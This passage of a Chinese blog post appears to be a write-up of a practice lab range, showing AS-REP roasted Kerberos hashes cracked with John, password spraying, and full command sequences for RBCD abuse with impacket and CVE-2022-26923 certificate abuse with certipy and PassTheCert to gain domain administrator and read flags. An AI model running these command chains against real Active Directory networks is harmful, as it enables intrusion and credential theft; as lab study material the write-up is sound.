<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:e5b9df0a854b830ce5f6e5ffe2499d71$d9d9dc060842070cd86a8ecae9e214d3a0ca14b815dc3c39e39c02a33d8e905757ff35a61a31e6dae59482b894e391be7ac67d4f7f484c37cc1dd80c93be6c30ac3a3e8217380170959db080a27cf29adff473385a7c554fe06c8512039f90255f853ce5be6e456377d5aec2530e674ac79c79bae51343f0150105c46703f0a7f1ba694e72c5b4d24aea907e04c33579b7601bda211fa28e0704115de88b9c073ab8863108a2013e8ec447163ec837615ca4dce0798bfdc3424400bdb37a5f0c0497ba4d7b4da0b56c726aca69ef6234ce75776b5bed88c814ec1d0b75b64cb38e94ff66ef5ef3b0a4b4ac8b</span><br><span class="line"></span><br><span class="line">$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:65b092a36dd8d1c0c081c95ced2a0b5c$086f1297cb9911ce21af8569c7ffa32cd14a45c40e4b8b6d238eef27ba3950ca99d6101a323a4b3fa208c5569079d6090aa3ac6e8282e9ebcf648f8fff5931a2a171818303a0028b2fa3efc2bdd83650f8bbf4d303ef3974df40671e4185a8b47f424c64a416bd394501f122bb3e92d12b801f66eb5c6b3851337423e6242dbb85922fa767eb1855c1e2568d328c88158e9810ee2de558e0478026341ef05645ef5b23f943c6967590aea7d5f68a77d7ce6fe30e5536aabb7909c6695963f8dd47259e3b64922440007cb38e9252657053008213812802a49a3dbb27d8a3047a3489d9e81e24d4a64fa57d97</span><br></pre></td></tr></table></figure>

<p>将申请到的TGT保存在文件中，使用John加载rockyou进行暴力破解。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">john --wordlist=/usr/share/wordlists/rockyou.txt /home/symya/桌面/hash.txt</span><br></pre></td></tr></table></figure>

<p>爆破出来为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">lixiuying:winniethepooh </span><br><span class="line">huachunmei:1qaz2wsx</span><br></pre></td></tr></table></figure>

<p>找一下这个是哪台机子的账密，crackmapexec喷洒一下</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 -q crackmapexec smb 172.22.15.0/24 -u &#x27;lixiuying&#x27; -p &#x27;winniethepooh&#x27; </span><br></pre></td></tr></table></figure>
<p>发现只有只有172.22.15.35(XR-0687)可以成功登录上<br>⚠️upload failed, check dev console<br>rdp登录</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">lixiuying@xaiorang.lab</span><br><span class="line">winniethepooh</span><br></pre></td></tr></table></figure>

<h3 id="ACL-Abuse-RBCD提权"><a href="#ACL-Abuse-RBCD提权" class="headerlink" title="ACL Abuse+RBCD提权"></a>ACL Abuse+RBCD提权</h3><blockquote>
<p>基于资源的约束委派（Resource-Based Constrained Delegation，RBCD）是在Windows Server 2012中新引入的功能。与传统的约束委派相比，它将设置委派的权限交还给了服务资源自身，也就是说服务自己可以决定“谁可以对我进行委派。”基于资源的约束委派的关键在于msDS-AllowedToActOnBehalfOfOtherIdentity属性的设置。</p>
</blockquote>
<p>用 bloodhound 收集域内信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp</span><br></pre></td></tr></table></figure>
<p>可以看到 lixiuying 对 XR-0687 具有 GenericWrite 权限，那么我们就可以通过配置 RBCD 拿到 XR-0687 的权限</p>
<p>使用impacket工具<br>添加用户</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 python3 addcomputer.py xiaorang.lab/lixiuying:&#x27;winniethepooh&#x27; -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name &#x27;TEST$&#x27; -computer-pass &#x27;123@asd&#x27;</span><br></pre></td></tr></table></figure>

<p>rbcd攻击</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 python3 rbcd.py xiaorang.lab/lixiuying:&#x27;winniethepooh&#x27; -dc-ip 172.22.15.13 -action write -delegate-to &#x27;XR-0687$&#x27; -delegate-from &#x27;TEST$&#x27;</span><br></pre></td></tr></table></figure>
<p>得到机器码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">TEST$        (S-1-5-21-3745972894-1678056601-2622918667-1147)</span><br></pre></td></tr></table></figure>
<p>创建票据</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 python3 getST.py xiaorang.lab/&#x27;TEST$&#x27;:&#x27;123@asd&#x27; -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13</span><br></pre></td></tr></table></figure>
<p>导入票据</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">export KRB5CCNAME=Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache </span><br></pre></td></tr></table></figure>
<p>报错：<code>[Errno 111] Connection refused</code>，改&#x2F;etc&#x2F;hosts<br>无密码连接</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 -q python3 psexec.py  -k -no-pass -dc-ip 172.22.15.13 administrator@XR-0687.xiaorang.lab -codec gbk</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410220224766.png" alt="image.png"><br>得flag03</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">type C:\Users\Administrator\flag\flag03.txt</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410220227581.png" alt="image.png"></p>
<h3 id="Active-Directory-域权限提升漏洞-CVE-2022-26923"><a href="#Active-Directory-域权限提升漏洞-CVE-2022-26923" class="headerlink" title="Active Directory 域权限提升漏洞(CVE-2022-26923)"></a>Active Directory 域权限提升漏洞(CVE-2022-26923)</h3><p>2022年5月10日，微软发布补丁修复了一个Active Directory域权限提升漏洞（CVE-2022-26923）。该漏洞是由于对用户属性的不正确获取，允许低权限用户在安装了Active Directory证书服务（AD CS）的域环境中将权限提升至域管理员。</p>
<p>默认情况下，域用户账户可以注册User证书模板，计算机账户可以注册Machine证书模板。两个证书模板都允许执行客户端身份验证。<br>在申请计算机证书时，ADCS将计算机对象的dNSHostName属性的值添加到证书的主题备用名称中。当我们使用证书进行身份验证是，KDC会尝试将这个dNSHOstName属性值从证书映射到目标账户。<br>因此，如果我们将某个可控计算机账户（Test1$）的dNSHostName值改为与域控制器的计算机账户相同的dNSHostName值，那么就意味着我们可以欺骗ADCS，并最终申请到域控制器的AD证书。</p>
<p>简述：通过构造机器账户并篡改dNSHostName属性，在证书申请时AD CS将dNSHostName属性嵌入证书中，进而机器账户获得高权限的域控身份。</p>
<p>添加一个账户,然后设置 DNS Host Name 为域控的 XR-DC01.xiaorang.lab。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 -q certipy account create -user &#x27;test2&#x27; -pass &#x27;123@asd&#x27; -dns XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 -u lixiuying -p &#x27;winniethepooh&#x27;</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410220255004.png" alt="image.png"><br>然后用这个账户向 XR-CA请求证书</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 -q certipy req -u &#x27;test2$@xiaorang.lab&#x27; -p &#x27;123@asd&#x27; -ca &#x27;xiaorang-XR-CA-CA&#x27; -target 172.22.15.18 -template &#x27;Machine&#x27;</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410220301046.png" alt="image.png"><br>检索 Hash 生成票据</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 -q certipy auth -pfx xr-dc01.pfx -dc-ip 172.22.15.13</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410220302284.png" alt="image.png"><br>报错</p>
<blockquote>
<p>KDC_ERR_PADATA_TYPE_NOSUPP<br>在尝试使用智能卡登录时，无法找到合适的证书。可能是由于查询了错误的认证机构（CA）<br>当域控制器没有安装智能卡（域控制器或域控制器认证模板）的证书时，也可能发生这种情况。</p>
</blockquote>
<p>尝试 Schannel，通过 Schannel将证书传递到 LDAPS, 修改 LDAP 配置 (例如配置 RBCD &#x2F; DCSync), 进而获得域控权限。<br>转换证书格式  ,把pfx导出为.key 和.crt 两个文件。密码为空密码即可</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">openssl pkcs12 -in xr-dc01.pfx -nodes -out test.pem</span><br><span class="line">openssl rsa -in test.pem -out test.key</span><br></pre></td></tr></table></figure>
<p>下载PassTheCert.py</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 -q passthecert.py -action whoami -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13 </span><br></pre></td></tr></table></figure>
<p>下一步将证书配置到域控的 RBCD</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 -q passthecert.py -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to &#x27;XR-DC01$&#x27; -delegate-from &#x27;test2$&#x27; </span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410220315743.png" alt="image.png"><br>申请ST</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 -q getST.py xiaorang.lab/&#x27;test2$&#x27;:&#x27;123@asd&#x27; -dc-ip 172.22.15.13 -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410220317122.png" alt="image.png"></p>
<p>导入申请的票据</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">export KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache</span><br></pre></td></tr></table></figure>
<p>连接，也要修改&#x2F;etc&#x2F;hosts</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 python3 psexec.py Administrator@XR-DC01.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13</span><br></pre></td></tr></table></figure>
<p>读flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">type C:\Users\Administrator\flag\flag04.txt</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410220322598.png" alt="image.png"></p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta"><i class="fas fa-circle-user fa-fw"></i>文章作者: </span><span class="post-copyright-info"><a href="https://symya.github.io">symv1a</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta"><i class="fas fa-square-arrow-up-right fa-fw"></i>文章链接: </span><span class="post-copyright-info"><a href="https://symya.github.io/2024/10/35990125633d.html">https://symya.github.io/2024/10/35990125633d.html</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta"><i class="fas fa-circle-exclamation fa-fw"></i>版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="external nofollow noopener noreferrer">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://symya.github.io" target="_blank">symv1a's blog</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a></div><div class="post_share"><div class="social-share" data-image="/image/touxiang.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.3/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.3/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2024/11/e5e321b44b6d.html" title="webgoat1[A1-A3]"><div class="cover" style="background: var(--default-bg-color)"></div><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">webgoat1[A1-A3]</div></div></a></div><div class="next-post pull-right"><a href="/2024/09/42001f8a4def.html" title="2024ByteCTF"><div class="cover" style="background: var(--default-bg-color)"></div><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">2024ByteCTF</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/image/touxiang.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"></div><div class="author-info__name">symv1a</div><div class="author-info__description">路漫漫其修远兮</div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">9</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">15</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">4</div></a></div><div class="card-info-social-icons is-center"><a class="social-icon" href="mailto:symv1a@163.com" target="_blank" title="Email" rel="external nofollow noopener noreferrer"><i class="fas fa-envelope" style="color: #4a7dbe;"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content is-expand"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0"><span class="toc-number">1.</span> <span class="toc-text">复现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#web%E6%B8%97%E9%80%8F"><span class="toc-number">1.1.</span> <span class="toc-text">web渗透</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%8E%E6%B8%97%E9%80%8F"><span class="toc-number">1.2.</span> <span class="toc-text">后渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#fscan"><span class="toc-number">1.2.1.</span> <span class="toc-text">fscan</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9A%A7%E9%81%93%E6%90%AD%E5%BB%BA"><span class="toc-number">1.2.2.</span> <span class="toc-text">隧道搭建</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#MS17-010"><span class="toc-number">1.2.3.</span> <span class="toc-text">MS17-010</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#rdp%E8%BF%9E%E6%8E%A5"><span class="toc-number">1.2.4.</span> <span class="toc-text">rdp连接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BC%B1%E5%8F%A3%E4%BB%A4%E6%8E%A5%E7%AE%A1OA"><span class="toc-number">1.2.5.</span> <span class="toc-text">弱口令接管OA</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#XR-0687AS-ERP-Roasting"><span class="toc-number">1.2.6.</span> <span class="toc-text">XR-0687AS-ERP Roasting</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ACL-Abuse-RBCD%E6%8F%90%E6%9D%83"><span class="toc-number">1.2.7.</span> <span class="toc-text">ACL Abuse+RBCD提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Active-Directory-%E5%9F%9F%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E-CVE-2022-26923"><span class="toc-number">1.2.8.</span> <span class="toc-text">Active Directory 域权限提升漏洞(CVE-2022-26923)</span></a></li></ol></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2024/11/e5e321b44b6d.html" title="webgoat1[A1-A3]">webgoat1[A1-A3]</a><time datetime="2024-11-15T14:06:25.567Z" title="发表于 2024-11-15 22:06:25">2024-11-15</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2024/10/35990125633d.html" title="春秋云境-2022网鼎杯半决赛复现">春秋云境-2022网鼎杯半决赛复现</a><time datetime="2024-10-22T07:30:04.508Z" title="发表于 2024-10-22 15:30:04">2024-10-22</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2024/09/42001f8a4def.html" title="2024ByteCTF">2024ByteCTF</a><time datetime="2024-09-25T16:00:00.000Z" title="发表于 2024-09-26 00:00:00">2024-09-26</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2024/09/3625224fcbf6.html" title="Python反序列化漏洞分析">Python反序列化漏洞分析</a><time datetime="2024-09-01T13:57:01.381Z" title="发表于 2024-09-01 21:57:01">2024-09-01</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2024/08/1958d8ad2c16.html" title="ysoserial-URLDNS链">ysoserial-URLDNS链</a><time datetime="2024-08-23T02:59:45.589Z" title="发表于 2024-08-23 10:59:45">2024-08-23</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2024 By symv1a</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="external nofollow noopener noreferrer" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="external nofollow noopener noreferrer" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="translateLink" type="button" title="简繁转换">繁</button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js?v=4.13.0"></script><script src="/js/main.js?v=4.13.0"></script><script src="/js/tw_cn.js?v=4.13.0"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0.33/dist/fancybox/fancybox.umd.min.js"></script><div class="js-pjax"></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><div id="algolia-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">搜索</span><button class="search-close-button"><i class="fas fa-times"></i></button></nav><div class="search-wrap"><div id="algolia-search-input"></div><hr><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-info"><div class="algolia-stats"></div><div class="algolia-poweredBy"></div></div></div></div></div><div id="search-mask"></div><script src="https://cdn.jsdelivr.net/npm/algoliasearch@4.22.1/dist/algoliasearch-lite.umd.min.js"></script><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@4.65.0/dist/instantsearch.production.min.js"></script><script src="/js/search/algolia.js?v=4.13.0"></script></div></div></body></html>